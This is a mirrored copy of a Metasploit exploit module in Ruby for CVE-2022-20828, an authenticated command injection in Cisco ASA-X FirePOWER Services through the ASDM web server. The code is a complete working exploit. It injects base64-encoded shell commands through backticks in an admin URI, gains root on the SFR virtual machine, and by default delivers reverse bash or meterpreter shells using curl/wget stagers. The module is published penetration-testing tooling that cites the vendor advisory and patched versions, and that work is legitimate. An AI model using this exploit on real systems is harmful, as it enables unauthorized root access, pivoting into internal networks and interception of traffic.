CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/linux/http/cisco_asax_sfr_rce.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78prepend Msf::Exploit::Remote::AutoCheck9include Msf::Exploit::Remote::HttpClient10include Msf::Exploit::CmdStager11include Msf::Exploit::FileDropper1213def initialize(info = {})14super(15update_info(16info,17'Name' => 'Cisco ASA-X with FirePOWER Services Authenticated Command Injection',18'Description' => %q{19This module exploits an authenticated command injection vulnerability affecting20Cisco ASA-X with FirePOWER Services. This exploit is executed through the ASA's21ASDM web server and lands in the FirePower Services SFR module's Linux virtual22machine as the root user. Access to the virtual machine allows the attacker to23pivot to the inside network, and access the outside network. Also, the SFR24virtual machine is running snort on the traffic flowing through the ASA, so25the attacker should have access to this diverted traffic as well.2627This module requires ASDM credentials in order to traverse the ASDM interface.28A similar attack can be performed via Cisco CLI (over SSH), although that isn't29implemented here.3031Finally, it's worth noting that this attack bypasses the affects of the32`lockdown-sensor` command (e.g. the virtual machine's bash shell shouldn't be33available but this attack makes it available).3435Cisco assigned this issue CVE-2022-20828. The issue affects all Cisco ASA that36support the ASA FirePOWER module (at least Cisco ASA-X with FirePOWER Service,37and Cisco ISA 3000). The vulnerability has been patched in ASA FirePOWER module38versions 6.2.3.19, 6.4.0.15, 6.6.7, and 7.0.21. The following versions will39receive no patch: 6.2.2 and earlier, 6.3.*, 6.5.*, and 6.7.*.40},41'License' => MSF_LICENSE,42'Author' => [43'jbaines-r7' # Vulnerability discovery and Metasploit module44],45'References' => [46[ 'CVE', '2022-20828' ],47[ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asasfr-cmd-inject-PE4GfdG' ],48[ 'URL', 'https://www.rapid7.com/blog/post/2022/08/11/rapid7-discovered-vulnerabilities-in-cisco-asa-asdm-and-firepower-services-software/' ],49[ 'URL', 'https://www.cisco.com/c/en/us/td/docs/security/asa/quick_start/sfr/firepower-qsg.html']50],51'DisclosureDate' => '2022-06-22',52'Platform' => ['unix', 'linux'],53'Arch' => [ARCH_CMD, ARCH_X64,],54'Privileged' => true,55'Targets' => [56[57'Shell Dropper',58{59'Platform' => 'unix',60'Arch' => ARCH_CMD,61'Type' => :unix_cmd,62'DefaultOptions' => {63'PAYLOAD' => 'cmd/unix/reverse_bash'64}65}66],67[68'Linux Dropper',69{70'Platform' => 'linux',71'Arch' => ARCH_X64,72'Type' => :linux_dropper,73'CmdStagerFlavor' => [ 'curl', 'wget' ],74'DefaultOptions' => {75'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'76}77}78]79],80'DefaultTarget' => 1,81'DefaultOptions' => {82'RPORT' => 443,83'SSL' => true,84'MeterpreterTryToFork' => true85},86'Notes' => {87'Stability' => [CRASH_SAFE],88'Reliability' => [REPEATABLE_SESSION],89'SideEffects' => [ARTIFACTS_ON_DISK]90}91)92)93register_options([94OptString.new('TARGETURI', [true, 'Base path', '/']),95OptString.new('USERNAME', [true, 'Username to authenticate with', '']),96OptString.new('PASSWORD', [true, 'Password to authenticate with', '']),97])98end99100def check101res = send_request_cgi({102'method' => 'GET',103'uri' => normalize_uri(target_uri.path, '/admin/exec/session+sfr+do+`id`'),104'headers' =>105{106'User-Agent' => 'ASDM/ Java/1',107'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])108}109})110return CheckCode::Unknown('The target did not respond to the check.') unless res111return CheckCode::Safe('Authentication failed.') if res.code == 401112return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200113114if res.body.include?('Invalid do command uid=0(root)')115return CheckCode::Vulnerable("Successfully executed the 'id' command.")116end117118CheckCode::Safe('The command injection does not appear to work.')119end120121def execute_command(cmd, _opts = {})122# base64 encode the payload to work around bad characters and then uri encode123# the whole thing before yeeting it at the server124encoded_payload = Rex::Text.uri_encode("(base64 -d<<<#{Rex::Text.encode_base64(cmd)}|sh)&")125res = send_request_cgi({126'method' => 'GET',127'uri' => normalize_uri(target_uri.path, "/admin/exec/session+sfr+do+`#{encoded_payload}`"),128'headers' =>129{130'User-Agent' => 'ASDM/ Java/1',131'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])132}133})134135if res136fail_with(Failure::Unreachable, 'The target did not respond.') unless res137fail_with(Failure::NoAccess, 'Could not log in. Verify credentials.') if res.code == 401138fail_with(Failure::UnexpectedReply, "Received unexpected HTTP status code: #{res.code}.") unless res.code == 200139end140141if session_created?142# technically speaking, bash can hold the connection open and skip all the res checks143# also passing the res checks doesn't actually mean that the target was exploited so144# check a session was created to get verification145print_good('Session created!')146else147fail_with(Failure::NotVulnerable, 'The exploit was thrown but not session was created.')148end149end150151def exploit152print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")153154case target['Type']155when :unix_cmd156execute_command(payload.encoded)157when :linux_dropper158execute_cmdstager159end160end161end162163164